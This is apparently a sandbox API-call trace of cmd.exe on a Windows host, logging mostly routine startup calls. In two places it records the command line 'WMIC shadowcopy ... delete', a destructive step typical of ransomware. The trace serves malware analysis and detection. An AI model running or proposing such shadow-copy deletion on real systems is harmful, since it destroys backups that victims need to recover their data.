os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 267 os_tid = 0xae4 [0130.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f830 | out: lpSystemTimeAsFileTime=0x30f830*(dwLowDateTime=0x5526b250, dwHighDateTime=0x1d68245)) [0130.529] GetCurrentProcessId () returned 0xa6c [0130.529] GetCurrentThreadId () returned 0xae4 [0130.529] GetTickCount () returned 0x1156105 [0130.529] QueryPerformanceCounter (in: lpPerformanceCount=0x30f838 | out: lpPerformanceCount=0x30f838*=25042211491) returned 1 [0130.533] GetModuleHandleW (lpModuleName=0x0) returned 0x4a7b0000 [0130.533] __set_app_type (_Type=0x1) [0130.533] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7d7810) returned 0x0 [0130.533] __getmainargs (in: _Argc=0x4a7fa608, _Argv=0x4a7fa618, _Env=0x4a7fa610, _DoWildCard=0, _StartInfo=0x4a7de0f4 | out: _Argc=0x4a7fa608, _Argv=0x4a7fa618, _Env=0x4a7fa610) returned 0 [0130.533] GetCurrentThreadId () returned 0xae4 [0130.533] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xae4) returned 0x3c [0130.534] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0130.534] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0130.534] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0130.534] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.534] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f7c8 | out: phkResult=0x30f7c8*=0x0) returned 0x2 [0130.535] VirtualQuery (in: lpAddress=0x30f7b0, lpBuffer=0x30f730, dwLength=0x30 | out: lpBuffer=0x30f730*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0130.535] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f730, dwLength=0x30 | out: lpBuffer=0x30f730*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0130.535] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f730, dwLength=0x30 | out: lpBuffer=0x30f730*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0130.535] VirtualQuery (in: lpAddress=0x214000, lpBuffer=0x30f730, dwLength=0x30 | out: lpBuffer=0x30f730*(BaseAddress=0x214000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0130.535] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f730, dwLength=0x30 | out: lpBuffer=0x30f730*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0130.537] GetConsoleOutputCP () returned 0x1b5 [0130.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7ebfe0 | out: lpCPInfo=0x4a7ebfe0) returned 1 [0130.538] SetConsoleCtrlHandler (HandlerRoutine=0x4a7d3184, Add=1) returned 1 [0130.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.538] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7de194 | out: lpMode=0x4a7de194) returned 1 [0130.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.539] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.539] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.539] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7de198 | out: lpMode=0x4a7de198) returned 1 [0130.539] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.540] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.540] GetEnvironmentStringsW () returned 0x4d8b90* [0130.540] GetProcessHeap () returned 0x4c0000 [0130.540] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa7c) returned 0x4d9620 [0130.540] FreeEnvironmentStringsW (penv=0x4d8b90) returned 1 [0130.540] GetProcessHeap () returned 0x4c0000 [0130.540] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8) returned 0x4d8a10 [0130.540] GetEnvironmentStringsW () returned 0x4d8b90* [0130.540] GetProcessHeap () returned 0x4c0000 [0130.541] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa7c) returned 0x4da0b0 [0130.541] FreeEnvironmentStringsW (penv=0x4d8b90) returned 1 [0130.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e688 | out: phkResult=0x30e688*=0x44) returned 0x0 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x0, lpData=0x30e6a0*=0x18, lpcbData=0x30e684*=0x1000) returned 0x2 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x1, lpcbData=0x30e684*=0x4) returned 0x0 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x0, lpData=0x30e6a0*=0x1, lpcbData=0x30e684*=0x1000) returned 0x2 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x0, lpcbData=0x30e684*=0x4) returned 0x0 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x40, lpcbData=0x30e684*=0x4) returned 0x0 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x40, lpcbData=0x30e684*=0x4) returned 0x0 [0130.541] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x0, lpData=0x30e6a0*=0x40, lpcbData=0x30e684*=0x1000) returned 0x2 [0130.541] RegCloseKey (hKey=0x44) returned 0x0 [0130.542] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e688 | out: phkResult=0x30e688*=0x44) returned 0x0 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x0, lpData=0x30e6a0*=0x40, lpcbData=0x30e684*=0x1000) returned 0x2 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x1, lpcbData=0x30e684*=0x4) returned 0x0 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x0, lpData=0x30e6a0*=0x1, lpcbData=0x30e684*=0x1000) returned 0x2 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x0, lpcbData=0x30e684*=0x4) returned 0x0 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x9, lpcbData=0x30e684*=0x4) returned 0x0 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x4, lpData=0x30e6a0*=0x9, lpcbData=0x30e684*=0x4) returned 0x0 [0130.542] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e680, lpData=0x30e6a0, lpcbData=0x30e684*=0x1000 | out: lpType=0x30e680*=0x0, lpData=0x30e6a0*=0x9, lpcbData=0x30e684*=0x1000) returned 0x2 [0130.542] RegCloseKey (hKey=0x44) returned 0x0 [0130.542] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517466 [0130.542] srand (_Seed=0x5f517466) [0130.542] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" [0130.542] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" [0130.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0130.543] GetProcessHeap () returned 0x4c0000 [0130.543] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x218) returned 0x4dab40 [0130.543] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4dab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.543] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a7df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.543] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a7df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.543] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a7df360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.543] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.544] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.544] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.544] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.544] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.544] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.544] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.544] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.544] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.544] GetProcessHeap () returned 0x4c0000 [0130.544] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d9620 | out: hHeap=0x4c0000) returned 1 [0130.544] GetEnvironmentStringsW () returned 0x4d8b90* [0130.544] GetProcessHeap () returned 0x4c0000 [0130.544] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa94) returned 0x4dad60 [0130.544] FreeEnvironmentStringsW (penv=0x4d8b90) returned 1 [0130.545] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a7df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.545] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a7df360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.545] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.545] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.545] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.545] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.545] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.545] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.545] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.545] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.545] GetProcessHeap () returned 0x4c0000 [0130.545] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x5c) returned 0x4db800 [0130.545] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f490 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0130.545] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30f490, lpFilePart=0x30f470 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f470*="Desktop") returned 0x25 [0130.545] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0130.546] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f1a0 | out: lpFindFileData=0x30f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x4db870 [0130.546] FindClose (in: hFindFile=0x4db870 | out: hFindFile=0x4db870) returned 1 [0130.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f1a0 | out: lpFindFileData=0x30f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4db870 [0130.546] FindClose (in: hFindFile=0x4db870 | out: hFindFile=0x4db870) returned 1 [0130.546] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0130.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f1a0 | out: lpFindFileData=0x30f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x4db870 [0130.547] FindClose (in: hFindFile=0x4db870 | out: hFindFile=0x4db870) returned 1 [0130.547] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0130.547] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0130.547] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0130.547] GetProcessHeap () returned 0x4c0000 [0130.547] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dad60 | out: hHeap=0x4c0000) returned 1 [0130.547] GetEnvironmentStringsW () returned 0x4db870* [0130.547] GetProcessHeap () returned 0x4c0000 [0130.547] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xae8) returned 0x4dc360 [0130.547] FreeEnvironmentStringsW (penv=0x4db870) returned 1 [0130.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0130.548] GetProcessHeap () returned 0x4c0000 [0130.548] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4db800 | out: hHeap=0x4c0000) returned 1 [0130.548] GetProcessHeap () returned 0x4c0000 [0130.548] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4016) returned 0x4dce50 [0130.548] GetProcessHeap () returned 0x4c0000 [0130.548] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xe4) returned 0x4d9680 [0130.548] GetProcessHeap () returned 0x4c0000 [0130.548] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dce50 | out: hHeap=0x4c0000) returned 1 [0130.548] GetConsoleOutputCP () returned 0x1b5 [0130.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7ebfe0 | out: lpCPInfo=0x4a7ebfe0) returned 1 [0130.549] GetUserDefaultLCID () returned 0x409 [0130.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a7e7b50, cchData=8 | out: lpLCData=":") returned 2 [0130.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f5a0, cchData=128 | out: lpLCData="0") returned 2 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f5a0, cchData=128 | out: lpLCData="0") returned 2 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f5a0, cchData=128 | out: lpLCData="1") returned 2 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a7fa740, cchData=8 | out: lpLCData="/") returned 2 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a7fa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a7fa460, cchData=32 | out: lpLCData="Tue") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a7fa420, cchData=32 | out: lpLCData="Wed") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a7fa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a7fa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a7fa360, cchData=32 | out: lpLCData="Sat") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a7fa700, cchData=32 | out: lpLCData="Sun") returned 4 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a7e7b40, cchData=8 | out: lpLCData=".") returned 2 [0130.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a7fa4e0, cchData=8 | out: lpLCData=",") returned 2 [0130.550] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.551] GetProcessHeap () returned 0x4c0000 [0130.551] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x20c) returned 0x4d97e0 [0130.551] GetConsoleTitleW (in: lpConsoleTitle=0x4d97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0130.551] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0130.552] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0130.552] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0130.552] GetProcessHeap () returned 0x4c0000 [0130.552] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4012) returned 0x4dce50 [0130.552] GetProcessHeap () returned 0x4c0000 [0130.552] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dce50 | out: hHeap=0x4c0000) returned 1 [0130.555] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0130.555] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0130.555] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0130.555] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0130.555] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0130.555] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0130.555] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0130.555] GetProcessHeap () returned 0x4c0000 [0130.555] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb0) returned 0x4d9a00 [0130.555] GetProcessHeap () returned 0x4c0000 [0130.555] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x54) returned 0x4d9ac0 [0130.558] GetProcessHeap () returned 0x4c0000 [0130.558] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x9e) returned 0x4d9b20 [0130.559] GetConsoleTitleW (in: lpConsoleTitle=0x30f4b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.560] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f040, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f020, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f020*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.560] GetProcessHeap () returned 0x4c0000 [0130.560] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x218) returned 0x4d9bd0 [0130.560] GetProcessHeap () returned 0x4c0000 [0130.560] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xe2) returned 0x4d9df0 [0130.560] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0130.560] GetProcessHeap () returned 0x4c0000 [0130.560] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x420) returned 0x4c1320 [0130.560] SetErrorMode (uMode=0x0) returned 0x8001 [0130.561] SetErrorMode (uMode=0x1) returned 0x0 [0130.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x4c1330, lpFilePart=0x30ed40 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x30ed40*="wbem") returned 0x18 [0130.561] SetErrorMode (uMode=0x8001) returned 0x1 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4c1320, Size=0x54) returned 0x4c1320 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4c1320) returned 0x54 [0130.561] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x48) returned 0x4d9ee0 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x7c) returned 0x4d9f30 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d9f30, Size=0x48) returned 0x4d9f30 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d9f30) returned 0x48 [0130.561] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a7df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.561] GetProcessHeap () returned 0x4c0000 [0130.561] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xe8) returned 0x4d9f90 [0130.567] GetProcessHeap () returned 0x4c0000 [0130.567] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d9f90, Size=0x7e) returned 0x4d9f90 [0130.567] GetProcessHeap () returned 0x4c0000 [0130.567] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d9f90) returned 0x7e [0130.568] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x30eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eab0) returned 0x4da020 [0130.568] GetProcessHeap () returned 0x4c0000 [0130.568] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x28) returned 0x4d46c0 [0130.568] FindClose (in: hFindFile=0x4da020 | out: hFindFile=0x4da020) returned 1 [0130.569] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0130.569] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0130.569] GetConsoleTitleW (in: lpConsoleTitle=0x30f000, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.569] InitializeProcThreadAttributeList (in: lpAttributeList=0x30edb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30ed78 | out: lpAttributeList=0x30edb8, lpSize=0x30ed78) returned 1 [0130.569] UpdateProcThreadAttribute (in: lpAttributeList=0x30edb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30ed68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30edb8, lpPreviousValue=0x0) returned 1 [0130.569] GetStartupInfoW (in: lpStartupInfo=0x30eed0 | out: lpStartupInfo=0x30eed0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, 